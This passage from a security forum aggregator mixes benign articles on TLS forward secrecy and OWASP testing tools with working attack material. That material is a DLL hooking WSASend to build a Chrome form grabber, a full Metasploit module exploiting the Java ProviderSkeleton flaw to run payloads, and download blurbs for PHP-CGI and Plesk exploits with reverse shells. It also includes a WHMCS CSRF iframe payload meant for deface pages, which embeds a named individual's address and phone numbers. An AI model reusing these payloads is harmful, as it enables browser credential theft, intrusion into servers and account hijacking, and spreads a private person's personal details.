game making, we need the second InstallEHookEx((void*)vtable[16], &api_CreateDevice, &CreateDevice_hook); } times_load += 1; _asm popad return pDev; } HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface){ HRESULT final = ((pCreateDevice)api_CreateDevice.adr_new_api)(pDev, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface); _asm pushad DWORD * DevInterface = (DWORD*)*((DWORD*)*ppReturnedDeviceInterface); //VTABLE InstallEHookEx((void*)DevInterface[42], &api_EndScene, &EndScene_hook); //EndScene _asm popad return final; } HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter){ _asm pushad WriteText(pDevInter, L"AGE OF EMPIRES EXTENDED HOOK BY ROSDEVIL", 20, 20, 300, 50); if (GetAsyncKeyState(VK_F1))WriteText(pDevInter, L"Hooked functions:\n - CreateDevice\n - EndScene\n", 20, 50, 150, 100); _asm popad return ((pEndScene)api_EndScene.adr_new_api)(pDevInter); } void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height){ ID3DXFont *m_font; D3DXCreateFont(d3ddev, 15, 0, FW_BOLD, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, TEXT("Arial"), &m_font ); D3DCOLOR fontColor1 = D3DCOLOR_XRGB(255, 0, 0); RECT space; space.top = y; space.left = x; space.right = width + x; space.bottom = height + y; m_font->DrawText(NULL, text, -1, &space, 0, fontColor1); m_font->Release(); } [Example 3# - hooking WSASend] This example is again a dll, but doesn't require to be injected at the very beginning since the function that we are going to hook doesn't belong to a any class. It has been tested on Chrome to create a FormGrabber. //ChromeHook.dll #include "stdafx.h" #include "windows.h" #include "ExtendedHook.h" bool first = true; void start_hooking(); //I don't want to include all winsock.h so let's declare want we need: //(you can include winsock.h, it's quicker) typedef unsigned int SOCKET; typedef void* LPWSAOVERLAPPED_COMPLETION_ROUTINE; typedef struct __WSABUF { unsigned long len; char FAR *buf; } WSABUF, *LPWSABUF; typedef struct _WSAOVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; }; PVOID Pointer; }; HANDLE hEvent; } WSAOVERLAPPED, *LPWSAOVERLAPPED; //hook WSASend typedef int (WINAPI * pWSASend)( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); EHOOKSTRUCT api_WSASend; int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("WSASend", L"Ws2_32.dll", &api_WSASend, &WSASend_hook)==false){ MessageBox(0, L"Error while hooking WSASend", L"Hooker", MB_OK | MB_ICONWARNING); } } int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ){ _asm pushad if (first == true){ //only show the first time a call is intercepted MessageBox(0, L"WSASEND FIRST INTERCEPTED!", L"CHROME HOOK", MB_OK); first = false; } //NOW WE CAN HANDLE, CRACK, COPY, ALTER, SMASH, ABORT all it's parameters! //... your code man ... _asm popad return ((pWSASend)api_WSASend.adr_new_api)(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpOverlapped, lpCompletionRoutine); } Well, we're done! PUT LIKE IF YOU APPRECIATE I've updated my ExtendedHook.cpp, there were a little bug about the bytes to copy. [see attachment] RosDevil Sursa: ExtendedHook Functions c++ - rohitab.com - Forums
  18. [h=1]A simple SSL tweak could protect you from GCHQ/NSA snooping[/h][h=2]It might slow you down, but hey, you can't have everything[/h] By John Leyden, 26th June 2013 An obscure feature of SSL/TLS called Forward Secrecy may offer greater privacy, according to security experts who have begun promoting the technology in the wake of revelations about mass surveillance by the NSA and GCHQ. Every SSL connection begins with a handshake, during which the two parties in an encrypted message exchange perform authentication and agree on their session keys, through a process called key exchange. The session keys are used for a limited time and deleted afterwards. The key exchange phase is designed to allow two users to exchange keys without allowing an eavesdropper to intercept or capture these credentials. Several key exchange mechanisms exist but the most widely used mechanism is based on the well-known RSA algorithm, explains Ivan Ristic, director of engineering at Qualys. This approach relies on the server's private key to protect session keys. "This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server's private key can also uncover the session keys and thus decrypt everything," Ristic warns. This capability makes it possible for enterprise security tools - such as intrusion detection and web application firewalls - to screen otherwise undecipherable SSL encrypted traffic, given a server’s private keys. This feature has become a serious liability in the era of mass surveillance. GCHQ have been secretly tapping hundreds of fibre-optic cables to tap data, The Guardian reported last week, based on documents leaked to the paper by former NSA contractor turned whistleblower Edward Snowden. The NSA also carries out deep packet inspection analysis of traffic passing through US fibre optic networks. Related revelations show that the NSA applies particular attention - and special rules - to encrypted communications, such as PGP-encrypted emails and SSL encrypted messages. Captured data should really be destroyed within five years, unless it consists of "communications that are enciphered or reasonably believed to contain secret meaning, and sufficient duration may consist of any period of time during which encrypted material is subject to, or of use in, cryptanalysis", according to the terms of a leaked Foreign Intelligence Surveillance Court order. The upshot is that intelligence agencies are collecting all the traffic they can physically capture before attempting to snoop upon encrypted content, where possible. These techniques are currently only practical for intelligence agencies but this may change over time - and those interested in protecting privacy need to act sooner rather than later, Ristic argues. "Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic," Ristic explains. "Eventually, they might obtain the key in one way or another - for example, by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances. At that point, they will be able to go back in time to decrypt everything." The Diffie–Hellman protocol offers an alternative algorithm to RSA for cryptographic key exchange. Diffie–Hellman is slower but generates more secure session keys that can't be recovered simply by knowing the server's private key, a protocol feature called Forward Secrecy. "Breaking strong session keys is clearly much more difficult than obtaining servers' private keys, especially if you can get them via a warrant," Ristic explains. "Furthermore, in order to decrypt all communication, now you can no longer compromise just one key - the server's - but you have to compromise the session keys belonging to every individual communication session." Someone with access to the server's private key can perform an active man-in-the-middle attack and impersonate the target server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic for later decryption. So, Forward Secrecy still creates a significant obstacle against industrial scale snooping. SSL supports Forward Secrecy using two algorithms: Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). The main obstacle to using Forward Secrecy has been that Diffie-Hellman is significantly slower, leading to a decision by many website operators to disable the feature in order to get better performance. "In recent years, we've seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys," Ristic explains, adding that ECDHE is bit faster than DHE but still slower than RSA. In addition, ECDHE algorithms are relatively new and not as widely supported in web server software packages. The vast majority of modern browsers support ECDHE. Website admins who add support for the encryption technique would help the majority of their privacy-conscious customers and adding DHE allows Forward Secrecy to be offered to the rest. A blog post by Ristic explains how to enable Forward Secrecy on SSL web servers, a well as providing a good explanation about the technology is beneficial for privacy - as well as noting the limitations of the technique. "Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions a powerful adversary could take," Ristic warns. "For example, they could convince the server operator to simply record all session keys." "Server-side session management mechanisms could also impact Forward Secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated. "In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated - possibly never in extreme cases. "Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise Forward Secrecy," Ristic concludes. Ristic founded SSL Labs, a research project to measure and track the effective security of SSL on the internet. He has over time worked with other security luminaries such as Taher Elgamal, one of the creators of the SSL protocol, and Moxie Marlinspike, creator of Convergence, to tackle SSL governance and implementation issues and promote best practice. Whether sysadmins switch to more privacy-friendly key exchange methods in spite of performance drawbacks is by no means sure, but publicising the issue at least gives them the chance to decide for themselves. ® Sursa: A simple SSL tweak could protect you from GCHQ/NSA snooping • The Register
  19. Java Applet ProviderSkeleton Insecure Invoke Method Authored by Adam Gowdiak, Matthias Kaiser | Site metasploit.com This Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) EXPLOIT_STRING = "Exploit" def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method', 'Description' => %q{ This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC 'Matthias Kaiser' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2460' ], [ 'OSVDB', '94346' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'], [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 18 2013' )) end def randomize_identifier_in_jar(jar, identifier) identifier_str = rand_text_alpha(identifier.length) jar.entries.each { |entry| entry.name.gsub!(identifier, identifier_str) entry.data = entry.data.gsub(identifier, identifier_str) } end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class") @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class") @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length) @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name) super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("ExpProvider.class", @provider_class) jar.add_file("DisableSecurityManagerAction.class", @action_class) randomize_identifier_in_jar(jar, "metasploit") randomize_identifier_in_jar(jar, "payload") jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html html = %Q| <html> <body> <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </body> </html> | return html end end Sursa: Java Applet ProviderSkeleton Insecure Invoke Method ? Packet Storm
  20. PHP-CGI Argument Injection Authored by infodox Exploit for the PHP-CGI argument injection vulnerability disclosed in 2012. Has file uploading, inline shell spawning, and both python and perl reverse shell implementations using an earlier version of the "payload" library written for such exploits. Download: http://packetstormsecurity.com/files/download/122162/phpcgi.tar.gz Sursa: PHP-CGI Argument Injection ? Packet Storm
  21. Plesk PHP Code Injection Authored by Kingcope, infodox Reliable exploit for the Plesk PHP code injection vulnerability disclosed by Kingcope in June 2013. Can deliver inline and reverse shells using the payloads library, as well as offering (buggy) file upload features. Download: http://packetstormsecurity.com/files/download/122163/plesk-php.tar.gz Sursa: Plesk PHP Code Injection ? Packet Storm
  22. WHMCS Cross Site Request Forgery ########################################################################### # Exploit Title: WHMCS [CSRF] All Versions (0day) # Team: MaDLeeTs # Software Link: http://www.whmcs.com # Version: All # Site: http://www.MaDLeeTs.com # Email: LeeTHaXor@Y7Mail.com #######################Video####################################### http://vimeo.com/63686629 ########################################################################### https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768 ########################iFrame Code To Add On Deface############################## <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe> Example: <IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1=B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield%5B1%5D=max%40antswork.com&customfield%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&customfield%5B4%5D=%2B603.90578663&customfield%5B5%5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&customfield%5B7%5D=&customfield%5B8%5D=&customfield%5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel%3A+603.86560268+Fax%3A?+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe> ########################################################################### All you need to do is add it into your Deface page and make your target view the deface page, He MUST loggin 1st into his clientarea in order to get his email updated. ########################################################################### Greetz to : H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker | c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de | makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | | ThaRude | ThaDark | Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members ########################################################################### http://www.MaDLeeTs.com ########################################################################### Sursa: WHMCS Cross Site Request Forgery ? Packet Storm
  23. Encryption At The Software Level: Linux And Windows Description: In this video Mark Stanislav From Due Security Discuss about Encryption for Linux and Farooq Ahmed Development Manager of Online Tech discuss encryption for Windows. Encryption Changing plain text into cipher text in order to make the original data unreadable to anyone not possessing knowledge of the decryption algorithm and any required key For More Information Please Visit : Compliant Cloud | Colocation | Managed Servers | Disaster Recovery Sursa: Encryption At The Software Level: Linux And Windows
  24. Ssl Traffic Analysis Attacks - Vincent Berg Description: The talk will focus on modern SSL traffic analysis attacks. Although it has been known and great papers have been published about it most people still are not aware of the length an attacker can go through in order to extract useful information from the SSL sessions. By showing some large targets and some useful progress in that space it is hoped that the audience will gain a better understanding of what SSL traffic analysis is, that it is a real threat (depending on the skills of the assumed adversary), and some knowledge on how to try and avoid these type of attacks. There will be a bunch of research tools accompanying the talk with at least one being a proof of concept on how to do traffic analysis on Google Maps. For more information, please visit: :- Breakpoint 2012 Speakers List Sursa: Ssl Traffic Analysis Attacks - Vincent Berg
  25. [h=1]OWASP Top Ten Testing and Tools for 2013[/h]Jonathan Lampe June 27, 2013 In 2013 OWASP completed its most recent regular three-year revision of the OWASP Top 10 Web Application Security Risks. The Top Ten list has been an important contributor to secure application development since 2004, and was further enshrined after it was included by reference in the in the Payment Card Industry Security Standards Council’s Data Security Standards, better known as the PCI-DSS. Surprisingly, there were only a few changes between the 2010 Top Ten and 2013 Top Ten lists, including one addition, several reorders and some renaming. The most prevalent theme was probably that both cross-site scripting (XSS) and cross-site request forgery (CSRF) dropped in importance: XSS dropping apparently because safer scripting libraries are becoming more widespread, and CSRF dropping because these vulnerabilities are not as common as once thought. In any case, the current entries in the OWASP Top Ten Web Application Security Risks for 2013 are: A1: Injection: Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. [*] A2: Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities. [*] A3: Cross-Site Scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. [*] A4: Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data. [*] A5: Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server and platform. All these settings should be defined, implemented and maintained as many are not shipped with secure defaults. This includes keeping all software up to date. [*] A6: Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, SSNs, tax IDs and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud or other crimes. Sensitive data deserves extra protection such as encryption at rest or encryption in transit, as well as special precautions when exchanged with the browser. [*] A7: Missing Function Level Access Control Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality. [*] A8: Cross-Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. [*] A9: Using Components with Known Vulnerabilities Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts. [*] A10: Unvalidated Redirects and Forwards Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing, malware sites or use forwards to access unauthorized pages. This is the fourth edition of a list that comes out every three years, and with the limited changes between 2010 and 2013 it is fair to say that OWASP’s popular Top Ten list has matured. With maturity and popularity, automation and utilities that directly address the items on the list have arrived, and some of the best are summarized in the chart below. [TABLE] [TR] [TD]WEB APPLICATION RISK[/TD] [TD]SECURITY UTILITY[/TD] [/TR] [TR] [TD]A1: Injection[/TD] [TD]SQL Inject Me and Zed Attack Proxy (ZAP)[/TD] [/TR] [TR] [TD]A2: Broken Authentication and Session Management[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A3: Cross-Site Scripting (XSS)[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A4: Insecure Direct Object References[/TD] [TD]HTTP Directory Traversal Scanner, Burp Suite and ZAP[/TD] [/TR] [TR] [TD]A5: Security Misconfiguration[/TD] [TD]OpenVAS and WATOBO[/TD] [/TR] [TR] [TD]A6: Sensitive Data Exposure[/TD] [TD]Qualys SSL Server Test[/TD] [/TR] [TR] [TD]A7: Missing Function Level Access Control[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A8: Cross-Site Request Forgery (CSRF)[/TD] [TD]Tamper Data (Samurai WTF), WebScarab or ZAP[/TD] [/TR] [TR] [TD]A9: Using Components with Known Vulnerabilities[/TD] [TD]OpenVAS[/TD] [/TR] [TR] [TD]A10: Unvalidated Redirects and Forwards[/TD] [TD]ZAP[/TD] [/TR] [/TABLE] Those of you who read Russ McRee’s 2010 Top Ten security tools article will notice that most of the tools listed here were also identified in his 2010 survey. However, my approach differs from McRee’s in terms of breadth; whereas McRee aimed to provide a different tool for each of the top ten items, I aim to provide you with a smaller number of tools that should cover most of the top ten so you can concentrate your efforts on mastering fewer tools that do more. Along those lines, it is worth noting that several of my recommended tools, notably the Zed Attack Proxy (ZAP) and new entrant OpenVAS, have increased the breadth of their services to cover more Top Ten items since their original release. In fact, it may be worth taking a closer look at additional capabilities of any recommended tool on this list because many of these tools are still under active development. (For example, WATOBO now has a SQL injection probe, although I haven’t explored it far enough to recommend it yet.) [h=1]Two Main Types of Web Vulnerability Tools[/h] If you scan the chart you will notice that two tools are mentioned the most: OWASP’s Zed Attack Proxy (ZAP) and OpenVAS. These two tools represent two different classes of application scanning that every security researcher should familiarize his or herself with. First, there are the tools that look for common misconfigurations and outdated software, including default settings, sample content, insecure configurations, and old versions that harbor known vulnerabilities. These tools are represented in the chart above by OpenVAS, an open source project with several heavyweight sponsors including the government of Germany. Similar tools include Tenable’s Nessus and eEye’s Digital Security Retina, and perhaps about two dozen more actively development open source projects and commercial products. Second, there are the tools that help dig into specific web applications by automating SQL injection, authentication, session, XSS, directory traversal, redirect and other probes for common and serious vulnerabilities. These tools are represented in the chart above by ZAP. Most of these tools, including ZAP, use a combination of a local web proxy, web session recorder, web playback and thousands of variations on input manipulation to look for vulnerabilities. Similar tools include HP WebInspect, IBM AppScan (originally by WatchFire), dozens of other general-purpose web vulnerability scanners and hundreds of specific case utilities. [h=1]Other Web Vulnerability Tools[/h] In addition to these two main types of tools, most security practitioners will find themselves drawn to additional tools that allow them to dig further into certain classes of vulnerabilities. For example the “other tools” in my list were selected to cover areas where I worried about the thoroughness of my main tools, or where I wanted a second pair of eyes because of the risk. Your list of “other tools” will vary depending on the specific capabilities of your main tools, the needs of your clients or employer, your available operating systems and many other factors, but I selected mine for a few specific reasons. SQL Inject Me for #1 Injection – Although ZAP covers this, I selected a second tool to give me a second pair of eyes on this most common and deadly of vulnerabilities. (I never want to be caught with my pants down on OWASPs’ #1 vulnerability). HTTP Directory Traversal Scanner and Burp Suite for #4 Insecure Direct Object References – Although ZAP also covers this item, I like the breadth of scan and the output provided by either of these tools much more than ZAP’s breadth and output. WATOBO for #5 Security Misconfiguration – This is the highest-rated item that known vulnerability scanners like OpenVAS can detect. I wanted a second pair of eyes to make sure I am detecting more configuration issues, and to get a second opinion on questionable detects. Qualys SSL Server Test for #6 Sensitive Data Exposure – This could be my most controversial recommendation, but having dealt with the innards of SSL/TLS while developing several security products (including the FIPS 140 validation process with three different companies). I always feel like I have an incomplete picture of my SSL/TLS capabilities until I hit my app with Qualys’s SSL Server Test. None of the other local tests I’ve found (or written on my own) have quite the breadth of this hosted test. Tamper Data (Samurai WTF) and WebScarab for #8 Cross-Site Request Forgery (CSRF) – CSRF vulnerabilities can be surprisingly hard to pin down, because what often looks like a detect turns out to be false positive, and what looks like a clean access denial often really changes something interesting on the backend. To chase these vulnerabilities down (to the point where they are reproducible) you usually need to master a local web proxy that can help you manipulate specific fields. Two of the best are Tamper Data and WebScarab, and you will often find yourself switching to your favorite proxy after your main tool registers an initial detect. (Yes, I know ZAP is also a proxy, but it’s not my favorite proxy; it’s my favorite detector.) One other tool that web security practitioners should be familiar with is OWASP’s WebGoat package. This tool isn’t a scanner, probe or proxy: instead, WebGoat is an intentionally insecure web application that we can probe with these and other web security tools. [h=1]Specific Web Vulnerability Applications (Main Tools)[/h] [h=2]Deep Probe Into Specific Applications: OWASP’s Zed Attack Proxy (ZAP)[/h] (Probes for Cross-Site Scripting, Injection, Sessions, Directory Traversal, Unvalidated Redirects and Forwards, and acts as a web proxy to locate CSRF and similar vulnerabilities.) OWASP has recently sponsored the development of its own web application vulnerability scanner called the Zed Attack Proxy (or ZAP for short). It automatically spiders a target URL and looks for common vulnerabilities, especially issues with cookies, headers and cross-scripting. [h=3]Installing and Running Zed Attack Proxy[/h] Download and install the program from http://code.google.com/p/zaproxy/downloads/list Run the program from your Start menu When prompted, use the wizard to create an “SSL root certificate” Type in the URL of a target application in the “URL to attack” field on the “Quick Start” tab To avoid unwanted attention until you know what you’re doing, please stick to “http://localhost” URLs, such as your local copy of WebGoat Much of the power of ZAP comes from using it as an “inline” proxy rather than as an interactive application. To try this mode: Open “Tools | Options | Local proxy” and set the proxy port to an acceptable value (8080 is the default, but if you’re running multiple proxies and web applications on your local machine, things can get a little crowded). Open your web browser and set its proxy settings to “localhost” and port 8080 (or whatever you configured). Browse to a few sites in the web browser. Flip back to ZAP. Notice that the sites you visited (and a few referenced through advertisements and inclusions) are now listed in ZAP’s “Sites” list. Click the “History” tab in the lower half of ZAP. This will show the URLs that caused content to be added to ZAP’s “Sites” list. Once you have started to gather URLs in your sites list, you can expand, gather more information about or actively attack them. In the “Sites” tab, find a URL of a web page that you recognize on a site that you know has more content. Select it and then click the “play” icon on the “Spider” tab at the bottom of the screen to follow the links on the page. To look for SQL Injection or XSS vulnerabilities in a page, select the URL in the “Sites” tab and right-click it to list “Attack” options. To set your attack options (e.g. to just check for XSS and avoid SQL injection attacks), select “Analyse | Scan Policy…” to turn various tests on and off. [h=2]Bad Configuration and Old Software Scanner: OpenVAS[/h] (Probes for Security Misconfiguration, Missing Function Level Access Control, Using Components with Known Vulnerabilities.) I took my original formal security training in the late 1990s so I “grew up” on Nessus when it was still a free security scanning application. Since its switch to a commercial application, a handful of forks of the original Nessus code have carried on Nessus’s original promise of a free remote security scanner. My favorite alternative to Nessus these days is the OpenVAS project, which counts among its backers the national government of Germany. As noted in my chart above, this project is best at finding security misconfigurations, missing function level access controls (formerly known as “failure to restrict URL access”) and components with known vulnerabilities. It includes some SQL injection and other probes to test application input, but since it is mainly designed to scan networks for machines with bad configuration and outdated software, I think you should use it the same way. Installing and Running OpenVAS The OpenVAS software is available for several popular Linux distributions including CentOS, Fedora and Red Hat Enterprise Linux. It is also available on virtual appliances for Oracle VirtualBox and EMC VMware. Once installed, a web-based interface is available to guide you through the scanning process. You’ve likely seen the types of reports that this application generates before: rating findings by severity, and ranking multiple machines from least secure to most secure depending on the number and severity of findings on each machine. For more information, please see: http://www.openvas.org/ [h=1]Other Top Ten Web Application Vulnerabilities Utilities[/h] [h=2]Injection Utility: Security Compass’s SQL Inject Me[/h] Even if you have moved to Chrome or Safari for your daily web browsing, it’s hard to give up Firefox entirely because of its extensive library of add-ons. One of the best SQL injection tools available today is a Firefox add-on called “SQL Inject Me” from Security Compass. [h=3]Installing and Running SQL Inject Me[/h] Install and run the latest version of Firefox (I am currently using v20). Install the add on from: https://addons.mozilla.org/En-us/firefox/addon/sql-inject-me/ After installing the SQL Inject Me plug-in, follow these directions to use it: Navigate to the page or application you want to test. Right-click on the target page and select “Open SQL Inject Me Sidebar”. Once the side-bar is open, use the drop-down and buttons to perform specific attacks. [h=2]Advanced Web Proxy and CSRF Utility: OWASP WebScarab[/h] OWASP’s WebScarab is a Java-based web proxy that displays and allows you to manipulate the specific fields that are passed between browser and server. It is highly extensible, but you often need to know what you want to chase after and how to code to chase it with this tool. Further muddying this project is the fact that a “next generation” edition was started but has not been touched since 2011. For more information, please see: https://www.owasp.org/index.php/WebScarab_Getting_Started or https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project [h=2]Insecure Direct Object Reference Utility: Burp Suite[/h] In 2010, Russ McRee’s 2010 security tools article went into detail about how to use the Burp Suite to ferret out path and directory traversal issues. Path and directory traversal issues have been problematic for web servers and web applications since their inception, perhaps most famously in the 2000 IIS vulnerability that fed worms such as Nimda. Rather than repeat McRee’s work with Burp Suite, I will just agree that Burp Suite is good. For more information, please see: http://portswigger.net/burp/ [h=2]Insecure Direct Object Reference Utility: HTTP Directory Traversal Scanner[/h] Another tool that I like for directory traversal issues is the free HTTP Directory Traversal Scanner by John Leitch, an independent application security consultant in Michigan. This tool scans a given URL about ten thousand URL variants in an attempt to find a named file. It helpfully groups its results by return code and content, which makes it easy find needles in haystacks. For more information, please see: http://www.autosectools.com/Page/HTTP-Directory-Traversal-Scanner [h=2]Security Misconfiguration Utility: WATOBO[/h] Russ McRee’s 2010 security tools uses WATOBO to look for security misconfiguration issues and the tool 